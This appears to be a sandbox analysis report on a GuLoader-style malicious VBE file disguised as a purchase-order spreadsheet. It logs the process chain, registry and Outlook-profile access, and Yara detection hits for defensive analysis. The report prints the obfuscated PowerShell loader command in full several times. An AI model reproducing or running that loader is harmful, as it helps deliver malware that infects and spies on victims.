SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""T
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\WindowsJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""TJump to behavior
          Very long command line found
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4705
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4705Jump to behavior
          Source: PO-08784 xlsx.vbe, type: SAMPLEMatched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00C5A6484_2_00C5A648
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00C5EB004_2_00C5EB00
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00C5EB104_2_00C5EB10
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07C6C3E04_2_07C6C3E0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07C6D0D04_2_07C6D0D0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07C6DA184_2_07C6DA18
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07CB4EA84_2_07CB4EA8
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07CB78B04_2_07CB78B0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07CB25A94_2_07CB25A9
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07CB25B84_2_07CB25B8
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07D352C04_2_07D352C0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07D352B84_2_07D352B8
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07D300404_2_07D30040
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07D300074_2_07D30007
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07C644814_2_07C64481
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_1D770B8D17_2_1D770B8D
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_1F9CE5EA17_2_1F9CE5EA
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_1F9C8B7017_2_1F9C8B70
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_1F9C740017_2_1F9C7400
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_2037AC7017_2_2037AC70
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_203794D017_2_203794D0
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_2037451017_2_20374510
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_2037DE1017_2_2037DE10
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_2037668817_2_20376688
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_20370B1217_2_20370B12
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_2045154017_2_20451540
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_2045446017_2_20454460
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_20452D0317_2_20452D03
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_204548A017_2_204548A0
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_204514D417_2_204514D4
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_1D5FB206 NtQuerySystemInformation,17_2_1D5FB206
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_1D5FB1D5 NtQuerySystemInformation,17_2_1D5FB1D5
          Source: C:\Windows\System32\wscript.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: security.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-08784 xlsx.vbe"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""T
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.cmdline
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6FA6.tmp" "c:\Users\user\AppData\Local\Temp\3uneeqsg\CSC7012D3CA523F4D77AF1E1BF90852658.TMP"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\WindowsJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""TJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.cmdlineJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6FA6.tmp" "c:\Users\user\AppData\Local\Temp\3uneeqsg\CSC7012D3CA523F4D77AF1E1BF90852658.TMP"Jump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3743-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_1D5FAAB6 AdjustTokenPrivileges,17_2_1D5FAAB6
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_1D5FAA7F AdjustTokenPrivileges,17_2_1D5FAA7F
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zft31ohr.hmb.ps1Jump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBE@13/10@3/3
          Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ffc00a26ff38e37b47b2c75f92b48929\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4412:120:WilError_03
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4412:304:WilStaging_02
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
          Source: Binary string: $}l8C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.pdb source: powershell.exe, 00000004.00000002.1687266902.0000000004531000.00000004.00000800.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Yara detected GuLoader
          Source: Yara matchFile source: 00000004.00000002.1784183387.00000000093A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000000.1525854532.0000000001100000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Obfuscated command line found
